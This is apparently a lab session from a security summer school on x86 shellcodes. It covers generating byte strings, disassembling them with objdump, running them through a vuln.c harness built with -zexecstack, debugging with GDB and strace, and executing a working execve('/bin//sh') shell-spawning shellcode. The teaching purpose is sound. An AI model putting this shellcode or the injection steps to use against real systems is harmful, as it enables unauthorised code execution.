To work through this session, first clone or update the repository and navigate to the 07-shellcodes folder.
When creating an attack vector the attacker would usually aim to run a shellcode. However, due to program specifics and modern attack prevention mechanisms, it is uncommon for an attack to consist of a single step. There is no recipe, and an attacker will combine multiple steps and actions for the attack to be successful.
An attacker will typically employ information leak attacks to extract addresses and values, use buffer overflow attacks to overwrite sensitive data, inject shellcodes and execute them by modifying the program control flow, and so on. The way these steps are woven together depends on the vulnerability and the program specifics. The attacker is the one who needs to find the best way to tie these steps together to exploit the vulnerability.
A shellcode is a little piece of binary data that is meant to be executed by a process as part of an attack vector. An attacker would usually place a shellcode in the process memory and aim to execute it to trigger an advantageous effect for the attacker.
While a shellcode would typically result in the attacker gaining a shell process by means of the execve system call, this needn't always be the case. Some shellcodes may result in writing data to a socket, scanning the memory, opening/creating a file and many others.
A shellcode is typically written in assembly language and then assembled into binary object code and fed to the vulnerable program. There are three actions an attacker must undertake to run a shellcode in a vulnerable program:
When dealing with shellcodes, we work with binary data and we need to be able to generate it. One example is when we need to write a hexadecimal address such as 0x0804804b. Shellcodes may also need to be written to a file or be fed directly to the process. Generating (binary) data and writing it is a common process when creating attack vectors, especially when dealing with shellcodes.
In order to generate binary data, one can use any programming language, though it is common to use Bash (shell commands), Python or Perl. Let's write the hexadecimal address 0x0804804b to standard output using different approaches. The commands to do this are:
    $ echo -e '\x4b\x80\x04\x08'
    K�
    $ python -c 'print "\x4b\x80\x04\x08"'
    K�
    $ perl -e 'print "\x4b\x80\x04\x08"'
    K�
The binary data is not readable from a console. You can either pipe it to a hex dumping command (such as hexdump, xxd or od) or dump it to a file:
    $ python -c 'print "\x4b\x80\x04\x08"' | od -t x4
    0000000 0804804b 0000000a
    $ perl -e 'print "\x4b\x80\x04\x08"' > dump
    $ od -t x4 dump
    0000000 0804804b
    0000004
In the snippets above, the 0000000a value in the output processed from Python appears because the Python print statement (Python 2 syntax is used here) appends a newline character (\n, 0x0a in hexadecimal) to the output string.
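The same address can also be produced without the trailing newline. The following is a minimal sketch, assuming Python 3 is available (the commands above use Python 2 syntax); the helper name pack_address is ours, chosen for illustration only.

```python
import struct


def pack_address(address: int) -> bytes:
    """Pack a 32-bit address as 4 little-endian bytes (x86 byte order)."""
    return struct.pack("<I", address)


raw = pack_address(0x0804804B)
# Show the bytes as hex text; raw itself holds exactly 4 bytes, no newline.
print(raw.hex())
```

To emit the raw bytes themselves (for piping into od or xxd), one would typically write them with sys.stdout.buffer.write(raw), which does not append a newline.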
Python and Perl may also be used to generate a string that repeats a character a number of times. For example, if we wanted to generate 50 A characters followed by the above address we could issue the commands:
    $ python -c 'print "A"*50 + "\x4b\x80\x04\x08"' | xxd
    00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000030: 4141 4b80 0408 0a                        AAK....
    $ perl -e 'print "A"x50,"\x4b\x80\x04\x08"' | xxd
    00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
    00000030: 4141 4b80 0408                           AAK...
We've used xxd to dump hexadecimal data. In its right-hand column xxd shows the character for each byte, or a dot (.) when the corresponding byte is a non-printable character.
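As a rough Python 3 counterpart to the commands above, the sketch below builds the same 50-byte padding plus address and prints it in a simplified xxd-like layout. The function name hexdump_line and the exact column widths are our own choices, not the real xxd format.

```python
import struct


def hexdump_line(chunk: bytes) -> str:
    """Format up to 16 bytes as hex pairs plus a printable-ASCII column."""
    hex_part = " ".join(f"{b:02x}" for b in chunk)
    # Printable ASCII is 0x20..0x7e; everything else is shown as a dot.
    text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
    return f"{hex_part:<47}  {text}"


payload = b"A" * 50 + struct.pack("<I", 0x0804804B)
for offset in range(0, len(payload), 16):
    print(f"{offset:08x}: {hexdump_line(payload[offset:offset + 16])}")
```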
It is usually the case that we have access to the raw (binary) shellcode (that we may have generated) and we want to make sure it does exactly what we want it to do. For that we want to disassemble the binary shellcode.
In the 02-tutorial-binary-shellcode/src/ subfolder in the tasks archive there is a file named shellcode.bin that is a binary file:
    $ xxd shellcode.bin
    00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768  h!...horldho, Wh
    00000010: 4865 6c6c ba0e 0000 0089 e1bb 0100 0000  Hell............
    00000020: b804 0000 00cd 80                        .......
We can see there are some strings in the file, and we want to disassemble it as a raw file. For that we use objdump with the proper arguments:
    $ objdump -D -b binary -m i386 -M intel shellcode.bin
    shellcode.bin: file format binary
    Disassembly of section .data:
    00000000 <.data>:
       0:   68 21 0a 00 00          push   0xa21
       5:   68 6f 72 6c 64          push   0x646c726f
       a:   68 6f 2c 20 57          push   0x57202c6f
       f:   68 48 65 6c 6c          push   0x6c6c6548
      14:   ba 0e 00 00 00          mov    edx,0xe
      19:   89 e1                   mov    ecx,esp
      1b:   bb 01 00 00 00          mov    ebx,0x1
      20:   b8 04 00 00 00          mov    eax,0x4
      25:   cd 80                   int    0x80
The above command does raw disassembling. The arguments mean:
- -D: disassemble all, not only text/code zones. In our case this means disassemble the whole file.
- -b binary: treat the file as not having a specific object/executable format (such as ELF, COFF, Mach-O or PE).
- -m i386: the machine code inside the binary file is i386 (x86).
- -M intel: when disassembling use Intel assembly syntax, as opposed to the AT&T assembly syntax.
The binary file is indeed a shellcode: a short set of instructions that ends in a system call (int 0x80). This shellcode invokes system call number 4, i.e. write (eax is 4). It writes to file descriptor 1 (ebx is 1), meaning standard output. What this shellcode does is write the Hello, World!\n string to standard output.
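To see why the four push instructions end up spelling the message, the pushed immediates can be decoded by hand. The sketch below (Python 3, with a helper name of our own) lays the values out as they would sit in memory, assuming the usual x86 behaviour: the stack grows downward and each 32-bit value is stored little-endian.

```python
import struct

# Immediates pushed by the shellcode, in program order (from the disassembly).
pushed = [0x00000A21, 0x646C726F, 0x57202C6F, 0x6C6C6548]


def stack_bytes(values):
    """Return the bytes as laid out in memory from the final esp upward.

    The last value pushed sits at the lowest address, and each 32-bit
    value is stored in little-endian byte order.
    """
    return b"".join(struct.pack("<I", v) for v in reversed(values))


memory = stack_bytes(pushed)
# edx is 0xe, so write() sends the first 14 bytes starting at esp.
print(memory[:14])
```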
This binary shellcode file was obtained by writing a byte string. The byte string is stored in the shellcode.print file and we can regenerate the raw shellcode file through a command such as:
    $ cat shellcode.print
    \x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
    $ echo -en '\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80' > shellcode-2.bin
    $ cmp shellcode.bin shellcode-2.bin
As the last command (cmp) issues no output, we know the shellcode-2.bin file we generated is identical to the initial file.
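The conversion from the textual byte string to raw bytes can also be scripted. This is a small Python 3 sketch; byte_string_to_bytes is a name we made up, and it assumes the input consists only of \xNN escapes like the contents of shellcode.print.

```python
def byte_string_to_bytes(text: str) -> bytes:
    """Convert a textual byte string such as '\\x68\\x21' to raw bytes."""
    # Drop the "\x" prefixes, leaving plain hex digits for bytes.fromhex().
    hex_digits = text.strip().replace("\\x", "")
    return bytes.fromhex(hex_digits)


sample = r"\x68\x21\x0a\x00\x00"  # first instruction of the shellcode above
raw = byte_string_to_bytes(sample)
print(raw.hex())
```

Reading shellcode.print, passing its contents through this function and writing the result in binary mode would give a file that can be compared with cmp in the same way.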
Let's practice the generation and investigation of binary shellcodes.
Extract the byte strings from these two shellcodes (1, 2) and generate binary shellcode files. Then disassemble these binary shellcode files and check with the initial links that the assembly code is similar.
Now that we know what a shellcode is, what it looks like and how we can verify it through disassembling, let's test one. In the 03-tutorial-hello-shellcode/ subfolder in the tasks archive we have developed a very small program (vuln.c) for testing the shellcode.
The vuln.c program is very simple. What it does is define a shellcode string and initialize it to our earlier byte string shellcode for printing “Hello, World!”. In main we define a function pointer func_ptr and initialize it forcefully (through a type cast) to the shellcode string. Then we call func_ptr, which results in the execution of the binary code within the shellcode string.
In order to test it, we will first compile the program using make
    $ make
    cc -m32 -Wall -g -c -o vuln.o vuln.c
    cc -m32 -zexecstack vuln.o -o vuln
resulting in the generation of the vuln executable.
Then we will run the vuln executable:
    $ ./vuln
    Hello, World!
    Segmentation fault
and see that it really gets to execute the shellcode, since the “Hello, World!” string is printed to standard output. So the testing of the shellcode is successful.
The running of the executable also results in the process being delivered a segmentation violation signal (SIGSEGV, resulting in the Segmentation fault message being printed out), but we'll get to that later.
Note the -zexecstack option used when linking. This option is required to be able to execute code from the data section where the shellcode string is located. This is a trick on our side to allow the execution of code from commonly non-executable program sections; in modern programs these sections are usually non-executable and other actions are needed to bypass these limitations. We will discuss those in future sessions.
A shellcode will usually do any sort of action through the use of system calls. In the test above we used the write system call (i.e. system call number 4, stored in eax) to print the “Hello, World!” message. A system call is the most basic way of doing actions by directly accessing the operating system interface (i.e. the system call interface). The programmer stores the system call number in the eax register and the parameters in the other registers (ebx, ecx, edx, esi, edi) and then issues the system call trap through the int 0x80 instruction.
We can check the usage of system calls in a shellcode by disassembling the binary shellcode file and checking for the presence of the int 0x80 trap instruction. The experienced hacker would also check the byte string for the sequence \xcd\x80, which is the binary encoding of the int 0x80 trap instruction.
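The byte-level check can be automated. The following Python 3 sketch searches the “Hello, World!” shellcode from this session for the \xcd\x80 sequence; find_all is our own helper. Keep in mind that a raw byte match is only a hint, since the same two bytes could also appear inside an immediate operand, so disassembling remains the reliable check.

```python
# The "Hello, World!" shellcode, grouped one instruction per string literal.
SHELLCODE = bytes.fromhex(
    "68210a0000" "686f726c64" "686f2c2057" "6848656c6c"
    "ba0e000000" "89e1" "bb01000000" "b804000000" "cd80"
)


def find_all(data: bytes, pattern: bytes):
    """Return every offset at which pattern occurs in data."""
    offsets = []
    start = data.find(pattern)
    while start != -1:
        offsets.append(start)
        start = data.find(pattern, start + 1)
    return offsets


# Offsets of the int 0x80 encoding inside the shellcode.
print([hex(offset) for offset in find_all(SHELLCODE, b"\xcd\x80")])
```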
If we want to check that the shellcode is being run, or to debug it, we can use strace for monitoring system calls. For our above program we can check the calling of the write system call with strace
    $ strace ./vuln
    execve("./vuln", ["./vuln"], [/* 36 vars */]) = 0
    [...]
    write(1, "Hello, World!\n", 14Hello, World!
    ) = 14
    [...]
strace is able to show us the correct invocation of the write system call, with the proper arguments.
Another way of doing runtime investigation is through the use of GDB as shown in the next section.
strace is very useful for troubleshooting shellcode execution. There may be times when a shellcode appears OK when doing static analysis (i.e. disassembling) but it doesn't work properly. strace is a quick way to check that the system calls that we expect to happen are done properly (i.e. they use proper arguments).
Thorough dynamic investigation of the shellcode is achieved through the use of GDB. We will start the vuln executable under GDB and then we will see what happens when func_ptr gets called.
We will start the program under GDB (with PEDA support), break at main and check the disassembly of the code:
    $ gdb -q ./vuln
    Reading symbols from ./vuln...done.
    gdb-peda$ start
    [----------------------------------registers-----------------------------------]
    [...]
    [-------------------------------------code-------------------------------------]
       0x80483d6 <main+11>: mov ebp,esp
       0x80483d8 <main+13>: push ecx
       0x80483d9 <main+14>: sub esp,0x14
    => 0x80483dc <main+17>: mov DWORD PTR [ebp-0xc],0x80484c0
       0x80483e3 <main+24>: mov eax,DWORD PTR [ebp-0xc]
       0x80483e6 <main+27>: call eax
       0x80483e8 <main+29>: mov eax,0x0
       0x80483ed <main+34>: add esp,0x14
    [------------------------------------stack-------------------------------------]
    [...]
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Temporary breakpoint 1, main () at vuln.c:14
    14 void (*func_ptr)(void) = (void (*)(void)) shellcode;
    gdb-peda$
The current mov instruction and the next one (at addresses main+17 and main+24) result in eax being initialized to 0x80484c0. This is the equivalent of the func_ptr function pointer being initialized to the address of the shellcode string, as can be seen in the last part of the GDB output. We'll step two instructions (using the GDB si command) and check that:
    gdb-peda$ si
    [...]
    gdb-peda$ si
    [----------------------------------registers-----------------------------------]
    EAX: 0x80484c0 --> 0xa2168 ('h!\n')
    [...]
    [-------------------------------------code-------------------------------------]
       0x80483d9 <main+14>: sub esp,0x14
       0x80483dc <main+17>: mov DWORD PTR [ebp-0xc],0x80484c0
       0x80483e3 <main+24>: mov eax,DWORD PTR [ebp-0xc]
    => 0x80483e6 <main+27>: call eax
       0x80483e8 <main+29>: mov eax,0x0
       0x80483ed <main+34>: add esp,0x14
       0x80483f0 <main+37>: pop ecx
       0x80483f1 <main+38>: pop ebp
    [...]
    [------------------------------------stack-------------------------------------]
    [...]
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    0x080483e6 17 func_ptr();
    gdb-peda$ p/x &shellcode
    $1 = 0x80484c0
    gdb-peda$
As expected, eax is now initialized to 0x80484c0, the address of the shellcode string, as shown in the last GDB command.
The next instruction issued is call eax. This means that we will jump and execute code starting from the address in eax, i.e. the address of the shellcode string, our shellcode. We will issue multiple step-instruction (si) commands to see our program go through the shellcode instructions until reaching the system call trap instruction (int 0x80):
    gdb-peda$ si
    [...]
    gdb-peda$ si
    [...]
    gdb-peda$ si
    [...]
    [...]
    gdb-peda$ si
    [----------------------------------registers-----------------------------------]
    EAX: 0x4
    EBX: 0x1
    ECX: 0xffffd2fc ("Hello, World!\n")
    EDX: 0xe
    ESI: 0x0
    EDI: 0x0
    EBP: 0xffffd328 --> 0x0
    ESP: 0xffffd2fc ("Hello, World!\n")
    EIP: 0x80484e5 --> 0x10080cd
    EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x80484d9 <shellcode+25>: mov ecx,esp
       0x80484db <shellcode+27>: mov ebx,0x1
       0x80484e0 <shellcode+32>: mov eax,0x4
    => 0x80484e5 <shellcode+37>: int 0x80
       0x80484e7 <shellcode+39>: add BYTE PTR [ecx],al
       0x80484e9: sbb eax,DWORD PTR [ebx]
       0x80484eb: cmp ebp,DWORD PTR [eax]
       0x80484ed: add BYTE PTR [eax],al
    [------------------------------------stack-------------------------------------]
    [...]
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    0x080484e5 in shellcode ()
Before executing the system call trap we can see that the registers are filled properly:
- eax is 4, i.e. the number of the write system call
- ebx is 1, i.e. the file descriptor for standard output
- ecx points to the “Hello, World!\n” string located on the stack
- edx is 14 (0xe), the length of the “Hello, World!\n” string
When issuing the next instruction (the system call trap), the write system call will be invoked, resulting in the printing of the “Hello, World!\n” string.
After the system call returns, execution continues with whatever bytes follow the shellcode string. At a certain point these bytes are not going to be valid instructions, resulting in the delivery of the SIGSEGV signal and the program terminating its execution.
Up until now we've learned how to get a binary shellcode from a byte string shellcode using Bash, Python or Perl, and how to disassemble a raw binary shellcode to assembly format to check the shellcode instructions.
But we need to do it the other way around. We construct a shellcode using assembly and then we need to obtain its binary format and then its byte string format. The byte string format is the usual form in which we are going to use the shellcode in programs (be they C, Python, Perl or other programs).
In the 04-tutorial-gen-hello-shellcode/ subfolder in the tasks archive there is the shellcode.S file, an assembly file implementing the shellcode printing “Hello, World!\n” that we have used above. We'll use that to create the binary shellcode file and then the byte string shellcode. These steps are similar for any shellcode we would create.
First of all we will use nasm to assemble the shellcode.S file into the shellcode.bin file:
    $ nasm -o shellcode.bin shellcode.S
By default, nasm assembles the given assembly code into raw (also named flat-form) binary data. We can inspect the shellcode.bin file and disassemble it to check whether we did OK:
    $ xxd shellcode.bin
    00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768  h!...horldho, Wh
    00000010: 4865 6c6c ba0e 0000 0089 e1bb 0100 0000  Hell............
    00000020: b804 0000 00cd 80                        .......
    $ objdump -D -b binary -m i386 -M intel shellcode.bin
    shellcode.bin: file format binary
    Disassembly of section .data:
    00000000 <.data>:
       0:   68 21 0a 00 00          push   0xa21
       5:   68 6f 72 6c 64          push   0x646c726f
       a:   68 6f 2c 20 57          push   0x57202c6f
       f:   68 48 65 6c 6c          push   0x6c6c6548
      14:   ba 0e 00 00 00          mov    edx,0xe
      19:   89 e1                   mov    ecx,esp
      1b:   bb 01 00 00 00          mov    ebx,0x1
      20:   b8 04 00 00 00          mov    eax,0x4
      25:   cd 80                   int    0x80
As the output of the disassembling matches the initial assembly file (shellcode.S) we know we have the correct binary shellcode.
Now we need to extract the byte string shellcode from the binary shellcode file shellcode.bin. We could do this by hand, going through each byte printed out by xxd and building up the string, but we can automate this by using hexdump and its -e option for formatting:
    $ hexdump -v -e '"\\" 1/1 "x%02x"' shellcode.bin; echo
    \x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
The hexdump command, with the given arguments, prints each byte in a format such as \xAB, where AB is the two-digit hexadecimal representation of the byte.
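For comparison, the same \xAB formatting can be sketched in a few lines of Python 3. The function name to_byte_string is hypothetical and only stands in for the hexdump invocation above.

```python
def to_byte_string(data: bytes) -> str:
    """Render each byte as \\xAB, with AB its two-digit lowercase hex value."""
    return "".join(f"\\x{b:02x}" for b in data)


# The last two bytes of the shellcode above: the int 0x80 instruction.
print(to_byte_string(b"\xcd\x80"))
```

Applied to the contents of shellcode.bin (read in binary mode), this would be expected to yield the same string as the hexdump command.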
All of the above steps are incorporated in the Makefile in the 04-tutorial-gen-hello-shellcode/src/ subfolder. To get the binary shellcode file, we would issue the command:
    $ make
    nasm -o shellcode.bin shellcode.S
The above command assembles the shellcode.S file into the shellcode.bin file.
In order to obtain the byte string file, we would issue the command:
    $ make print
    \x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
resulting in the printing of the shellcode in byte string format.
The byte string shellcode can now be integrated into our code and it can be properly placed for execution inside a vulnerable program.
In the above running of the shellcode the process ended (crashed) by receiving a SIGSEGV signal. This happened because the shellcode binary code didn't “end” and the execution of binary code continued beyond the shellcode; when reaching an invalid binary instruction, the program crashes.
In order to avoid that and let the program return from the shellcode or exit gracefully after running the shellcode, we have two options:
- add a ret instruction at the end of the shellcode, resulting in the program getting back to the caller function (main);
- invoke the exit system call at the end of the shellcode.
Let's do the first one. We add a ret instruction at the end of the shellcode.S file in the 04-tutorial-gen-hello-shellcode/ subfolder in the tasks archive:
    $ cat shellcode.S
    BITS 32
        push 0x0a21         ; "\n!"
        push 0x646c726f     ; "dlro"
        push 0x57202c6f     ; "W ,o"
        push 0x6c6c6548     ; "lleH"
        mov edx, 14         ; Message length is 14 bytes.
        mov ecx, esp        ; Stack points to message.
        mov ebx, 1          ; Print to standard output (fd = 1).
        mov eax, 4          ; __NR_write
        int 0x80
        ret
In the above listing we can see the addition of the ret instruction to the shellcode.
We now need to extract the shellcode byte string and place it in the vulnerable program (vuln.c). We do that by using the Makefile in the 04-tutorial-gen-hello-shellcode/ subfolder:
    $ make print
    nasm -o shellcode.bin shellcode.S
    \x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80\xc3
We now place the above byte string shellcode in the vuln.c file in the 03-tutorial-hello-shellcode/ subfolder:
    $ cat vuln.c
    [...]
    static const char shellcode[] = "\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c"
        "\x64\x68\x6f\x2c\x20\x57\x68\x48\x65"
        "\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1"
        "\xbb\x01\x00\x00\x00\xb8\x04\x00\x00"
        "\x00\xcd\x80\xc3";
    [...]
We now compile the program using the new shellcode byte string
    $ make
    cc -m32 -Wall -g -c -o vuln.o vuln.c
    cc -m32 -zexecstack vuln.o -o vuln
and run it
    $ ./vuln
    Hello, World!
    Segmentation fault
Although we expected the program to exit gracefully, it still gets a SIGSEGV signal. We use dmesg to find out the faulting address:
    $ dmesg | tail -1
    [20349.560852] vuln[12204]: segfault at 6c6c6548 ip 000000006c6c6548 sp 00000000ff948540 error 14
We can see that the instruction pointer (ip) points to the address 0x6c6c6548. This “address” is actually string data; we can see that by printing its bytes:
    $ echo -e '\x6c\x6c\x65\x48'
    lleH
The above message is part of the Hello, World!\n message that we want to print. We assume that the stack stores additional data (such as our message), causing the ret instruction not to work properly.
We do a GDB investigation for additional info and see what happens when the ret instruction is executed within the shellcode:
    $ gdb -q ./vuln
    Reading symbols from ./vuln...done.
    gdb-peda$ start
    [...]
    gdb-peda$ si
    Hello, World!
    [----------------------------------registers-----------------------------------]
    EAX: 0xe
    EBX: 0x1
    ECX: 0xffffd2fc ("Hello, World!\n")
    EDX: 0xe
    ESI: 0x0
    EDI: 0x0
    EBP: 0xffffd328 --> 0x0
    ESP: 0xffffd2fc ("Hello, World!\n")
    EIP: 0x80484e7 --> 0xc3
    EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x80484db <shellcode+27>: mov ebx,0x1
       0x80484e0 <shellcode+32>: mov eax,0x4
       0x80484e5 <shellcode+37>: int 0x80
    => 0x80484e7 <shellcode+39>: ret
       0x80484e8 <shellcode+40>: add BYTE PTR [eax],al
       0x80484ea: add BYTE PTR [eax],al
       0x80484ec: add DWORD PTR [ebx],ebx
       0x80484ee: add edi,DWORD PTR [ebx]
    [------------------------------------stack-------------------------------------]
    0000| 0xffffd2fc ("Hello, World!\n")
    0004| 0xffffd300 ("o, World!\n")
    0008| 0xffffd304 ("orld!\n")
    0012| 0xffffd308 --> 0xa21 ('!\n')
    0016| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0)
    0020| 0xffffd310 --> 0x1
    0024| 0xffffd314 --> 0xffffd3d4 --> 0xffffd533 ("/home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/hello-shellcode/vuln")
    0028| 0xffffd318 --> 0xffffd3dc --> 0xffffd591 ("XDG_VTNR=7")
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    0x080484e7 in shellcode ()
    gdb-peda$ si
    [----------------------------------registers-----------------------------------]
    EAX: 0xe
    EBX: 0x1
    ECX: 0xffffd2fc ("Hello, World!\n")
    EDX: 0xe
    ESI: 0x0
    EDI: 0x0
    EBP: 0xffffd328 --> 0x0
    ESP: 0xffffd300 ("o, World!\n")
    EIP: 0x6c6c6548 ('Hell')
    EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
    Invalid $PC address: 0x6c6c6548
    [------------------------------------stack-------------------------------------]
    0000| 0xffffd300 ("o, World!\n")
    0004| 0xffffd304 ("orld!\n")
    0008| 0xffffd308 --> 0xa21 ('!\n')
    0012| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0)
    0016| 0xffffd310 --> 0x1
    0020| 0xffffd314 --> 0xffffd3d4 --> 0xffffd533 ("/home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/hello-shellcode/vuln")
    0024| 0xffffd318 --> 0xffffd3dc --> 0xffffd591 ("XDG_VTNR=7")
    0028| 0xffffd31c --> 0x80484c0 --> 0xa2168 ('h!\n')
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    0x6c6c6548 in ?? ()
    gdb-peda$
When executing the ret instruction we see that the instruction pointer ends up pointing to the 0x6c6c6548 address, which is actually the string Hell. If we investigate the stack before and after executing the ret instruction we find that the Hell string at the top of the stack (address 0xffffd2fc) was popped into the instruction pointer (as expected from a ret instruction). Before executing ret the stack pointer (esp) was 0xffffd2fc and pointed to the Hello, World!\n string; when executing ret the first four bytes (32 bits) were popped from the stack and placed into the instruction pointer (eip) and the stack pointer was incremented; that means eip now stores the Hell string and esp is 0xffffd300 and points to the rest of the string, o, World!\n.
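The effect of ret on this particular stack can be modelled in a few lines. The sketch below is a simplified Python 3 model (near ret on 32-bit x86: pop four little-endian bytes into eip, then add 4 to esp); simulate_ret is our own name, and the stack contents and addresses are taken from the GDB output above.

```python
import struct


def simulate_ret(stack: bytes, esp: int):
    """Model x86 ret: pop 4 little-endian bytes into eip, then esp += 4."""
    (eip,) = struct.unpack("<I", stack[:4])
    return eip, esp + 4


# Memory starting at esp right before ret: the message (padded by the
# push of 0x0a21), followed by the return address into main.
stack = b"Hello, World!\n\x00\x00" + struct.pack("<I", 0x080483E8)
eip, esp = simulate_ret(stack, 0xFFFFD2FC)
print(hex(eip), hex(esp))
```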
Our goal is to properly set the stack pointer before executing ret to make a successful return to the main function.
In order for ret to work properly, at the time the ret instruction is executed the stack pointer needs to be identical to its value when the shellcode started executing. That is, we need to increment the stack pointer (esp) to point to that value. In the above GDB output, the value is 0xffffd30c and it points to the return address in main, exactly what we want:
    0016| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0)
Update the shellcode to increment the stack pointer (esp) to the proper value right before issuing the ret instruction. This will mean a graceful return from the shellcode to the main function. If properly done, there would be no SIGSEGV being delivered to the program.
Use GDB to check the value of esp at the beginning of the running of the shellcode and before doing ret. You need to add the required value to esp right before the ret instruction in order for the stack to be in the same state it was in at the beginning of the shellcode.
Do not hardcode an absolute value for esp. Due to ASLR (Address Space Layout Randomization) being enabled, the top of the stack will be different each time the program is run. Use the add instruction to update the esp value and discard the string that was stored on the stack inside the shellcode.
Update the shellcode.S assembly file, then obtain the shellcode byte string, update vuln.c, compile it and run it.
Use GDB and si to go through each instruction in the shellcode and check the stack pointer (esp), the instruction pointer (eip), other registers and the stack contents.
Apart from using the ret instruction to return properly from the shellcode, we can also invoke the exit system call in the shellcode and terminate the program (gracefully).
Add an equivalent exit(0) system call in the shellcode using assembly language.
The exit system call number is 1. You may check the /usr/include/asm/unistd_32.h file for confirmation.
The system call number is placed in the eax register while the first argument is placed in the ebx register.
Up until now the string we used for printing inside the shellcode is “Hello, World!\n”. Let's change this to “Hello, Romania!\n”. For this you will have to update the shellcode.S assembly file and then obtain the byte string shellcode and place it into the vuln.c file.
Do that and check the program now prints the “Hello, Romania!\n” string to standard output. Build on the shellcode that encodes exit(0) so that the shellcode exits gracefully.
You can use the -e formatting option for hexdump. For example, to create the assembly code for placing the “Hello, World!\n” string on the stack, one would issue the command
    $ echo -en 'Hello, World!\n' | hexdump -v -e '1/4 "push 0x%08x\n"' | tac
    push 0x00000a21
    push 0x646c726f
    push 0x57202c6f
    push 0x6c6c6548
Adapt the above command, get the assembly code for placing “Hello, Romania!\n” on the stack, then update the shellcode, obtain the byte string, place it into the vuln.c file, compile the file, run the executable and … profit!
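The hexdump and tac pipeline can also be expressed as a short Python 3 function, which may be easier to adapt. This is a sketch under our own assumptions: push_instructions is a made-up name, and a message whose length is not a multiple of four is padded with NUL bytes, matching the 0x00000a21 value in the output above.

```python
import struct


def push_instructions(message: bytes):
    """Return NASM push lines that place message on the stack."""
    # Pad with NUL bytes up to a multiple of 4 (one push per 32-bit word).
    padded = message + b"\x00" * (-len(message) % 4)
    words = [struct.unpack("<I", padded[i:i + 4])[0]
             for i in range(0, len(padded), 4)]
    # The last word must be pushed first, so the message starts at esp.
    return [f"push 0x{w:08x}" for w in reversed(words)]


print("\n".join(push_instructions(b"Hello, World!\n")))
```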
As the name implies, a shellcode is usually used for getting a shell. This type of shellcode typically ends in the execve system call. Let's try this using the shellcode from here. We've already made sure that the byte string is valid and ends up invoking the 0xb (number 11) system call (i.e. execve).
We update the shellcode variable in vuln.c using this byte string shellcode:
    $ cat vuln.c
    [...]
    static const char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68"
        "\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
        "\xe1\xb0\x0b\xcd\x80";
    [...]
Now we compile the vuln.c program
    $ make
    cc -m32 -Wall -g -c -o vuln.o vuln.c
    cc -m32 -zexecstack vuln.o -o vuln
and then we run it
    $ ./vuln
    $
We can exit the new shell by running exit or by using the Ctrl+d keyboard combo.
After running the executable you get a new shell, so our shellcode was successful. We can see that by running the executable under strace and looking for the execve call:
    $ strace ./vuln
    [...]
    execve("/bin//sh", ["/bin//sh"], [/* 1 var */]) = 0
    [...]
The shellcode was successful and we managed to obtain a new shell.
In the 05-tutorial-bad-execve-shellcode/ subfolder in the lab archive you can find a version of the vuln.c program that uses the execve-based shellcode from above, except that there are some random integer operations in there. If you compile and run the program you get a Segmentation fault error:
    $ make
    cc -m32 -Wall -g -c -o vuln.o vuln.c
    cc -m32 -zexecstack vuln.o -o vuln
    $ ./vuln
    Segmentation fault
The cause of the error is a problem with the shellcode. The shellcode works on certain setups but not on all of them, due to an oversight by the shellcode author.
The problem shows up when the shellcode invokes the execve system call.
You can use strace to see the parameters of the execve system call when running ./vuln. That will offer you a hint on why the execve system call has failed.
Disassemble the shellcode, find out the problem with it, fix it and update it inside the vuln.c program so that you eventually get a shell.
In the vuln.c program we used so far, we initialize the func_ptr function pointer with the “suitable” shellcode address. This is the triggering phase for the shellcode-based attack but that's far from common in programs. What is usually the case is that a buffer is overflowed to overwrite a suitable address.
